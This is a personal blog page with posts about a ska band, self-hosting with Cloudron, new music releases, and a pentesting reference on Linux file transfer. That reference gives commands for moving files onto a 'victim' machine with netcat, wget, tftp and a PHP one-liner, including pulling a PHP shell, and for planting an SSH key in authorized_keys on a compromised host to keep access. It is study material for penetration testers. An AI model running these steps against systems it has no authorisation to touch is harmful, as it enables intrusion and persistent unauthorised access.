Skip to content

Will Chatham Posts

Ska City promo reel

Check out this promo we had made. The footage is from our show at Highland Brewing a few weeks ago. Thanks to Bob Peck at Mountainwater Films for putting this together!

Check out the Ska City website for all the latest news and upcoming gigs. I hope to see you soon!

Self Hosting – Cloudron

I have been using Cloudron recently, and after initially trying it out a couple years ago, I found it to be a really easy, awesome way to create my own, personal, cloud, keeping the peering eyes of big-tech out of my life.

So far I have been using Cloudron to manage my OnlyOffice office instance (better than MS Office or Google Docs) and my instance of Nextcloud, a Google Drive-like file storage and sharing center. They integrate with each other to create your own, secure, private office suite with file storage.

The best part is that you can do all this simply from the DigitalOcean Marketplace – a one-click shop for easy installation of everything. All you need is a domain name to point at it.

Once you have it installed, you can set it and forget it, as Cloudron will keep itself updated, patched, and secure.

Cloudron Coupon Code

It isn’t cheap to run Cloudron, but it lets you host 2 app without a subscriotion. I have yet to find a working Cloudron coupon code out there, but there are Cloudron referral codes such as my own (https://cloudron.io/?refcode=901142a319d1498b) which earn the referee a small discount. Once you have your own Cloudron account set up, you can use your own referral code and encourage others to use.

So that is me encouraging you to use my referrer code 😀

New Music

I have been cranking away at some new songs. I just released two over the last week. I hope you enjoy them. Please comment, subscribe, yada yada.

For the Sake of Everything

Rahu, Rahu

And, of course, you can hear the full album I released back in June:

If you’d like a copy of that album on CD, just shoot me your name and address. It is free, and I will cover the shipping cost!

Will Chatham’s Musical Variety Show is out!

My new solo album is out (unofficially)! It has been “soft launched” at willchathammusic.com and you can stream the whole thing from there, or buy it to download and listen to as you wish.

The album features some musical mastery from friend and former bandmate Morgan Geer (bass on Donald Trump Eats Babies), as well as the vocal talents of current bandmate David Earl Tomlinson (vocals on Hello My Friend).

Additionally, my two teens, Gray Chatham and Dax Chatham, contributed trumpet and sax parts on several songs. Needless to say, I am stoked at how all this came together.

The CDs and officially release to all the usual streaming services will be happening soon, but for now, here is the album. I hope you find something on it you like – it is a, well, variety of genres!

Linux File Transfer Techniques

Digging through my pentesting notes from over the last few years, I pulled together various scrawled things on quick ways to transfer files from one place to another. Thought I’d share the reference here in case anyone finds it useful.

Note: Some of this may have been copy/pasted from various places — I don’t honestly remember. If you recognize something, let me know – I am happy to give credit where credit is due!

Simple Python HTTP Server

This is an easy way to set up a web-server. This command will make the entire folder, from where you issue the command, available on port 9999.

python -m SimpleHTTPServer 9999

Wget

You can download files from that running Pything server using wget like this:

wget 192.168.1.102:9999/file.txt

Curl

curl -O <http://192.168.0.101/file.txt>

Netcat

Another easy way to transfer files is by using netcat.

If you can’t have an interactive shell it might be risky to start listening on a port, since it could be that the attacking-machine is unable to connect. So you are left hanging and can’t do ctr-c because that will kill your session.

So instead you can connect from the target machine like this.

On attacking machine:

nc -lvp 4444 < file

On target machine:

nc 192.168.1.102 4444 > file

You can of course also do it the risky way, the other way around:

So on the victim-machine we run nc like this:

nc -lvp 3333 > enum.sh

And on the attacking machine we send the file like this:

nc 192.168.1.103 < enum.sh

I have sometimes received this error:

This is nc from the netcat-openbsd package. An alternative nc is available

I have just run this command instead:

nc -l 1234 > file.sh

Socat

Server receiving file:

server$ socat -u TCP-LISTEN:9876,reuseaddr OPEN:out.txt,creat && cat out.txt
client$ socat -u FILE:test.txt TCP:127.0.0.1:9876

Server sending file:

server$ socat -u FILE:test.dat TCP-LISTEN:9876,reuseaddr
client$ socat -u TCP:127.0.0.1:9876 OPEN:out.dat,creat

With php

echo "<?php file_put_contents('nameOfFile', fopen('<http://192.168.1.102/file>', 'r')); ?>" > down2.php

Ftp

If you have access to a ftp-client to can of course just use that. Remember, if you are uploading binaries you must use binary mode, otherwise the binary will become corrupted!!!

Tftp

On some rare machine we do not have access to nc and wget, or curl. But we might have access to tftp. Some versions of tftp are run interactively, like this:

$ tftp 192.168.0.101
tftp> get myfile.txt

If we can’t run it interactively, for whatever reason, we can do this trick:

tftp 191.168.0.101 <<< "get shell5555.php shell5555.php"

SSH – SCP

If you manage to upload a reverse-shell and get access to the machine you might be able to enter using ssh. Which might give you a better shell and more stability, and all the other features of SSH. Like transferring files.

So, in the /home/user directory you can find the hidden .ssh files by typing ls -la.Then you need to do two things.

Create a new keypair

You do that with:

ssh-keygen -t rsa -C "your_email@example.com"

then you enter a name for the key.

Enter file in which to save the key (/root/.ssh/id_rsa): nameOfMyKeyEnter passphrase (empty for no passphrase):Enter same passphrase again:

This will create two files, one called nameOfMyKey and another called nameOfMyKey_pub. The one with the _pub is of course your public key. And the other key is your private.

Add your public key to authorized_keys

Now you copy the content of nameOfMyKey_pub.On the compromised machine you go to ~/.ssh and then run add the public key to the file authorized_keys. Like this

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQqlhJKYtL/r9655iwp5TiUM9Khp2DJtsJVW3t5qU765wR5Ni+ALEZYwqxHPNYS/kZ4Vdv..." > authorized_keys

Log in

Now you should be all set to log in using your private key. Like this

ssh -i nameOfMyKey kim@192.168.1.103

SCP

Now we can copy files to a machine using scp

# Copy a file:
scp /path/to/source/file.ext username@192.168.1.101:/path/to/destination/file.ext

# Copy a directory:
scp -r /path/to/source/dir username@192.168.1.101:/path/to/destination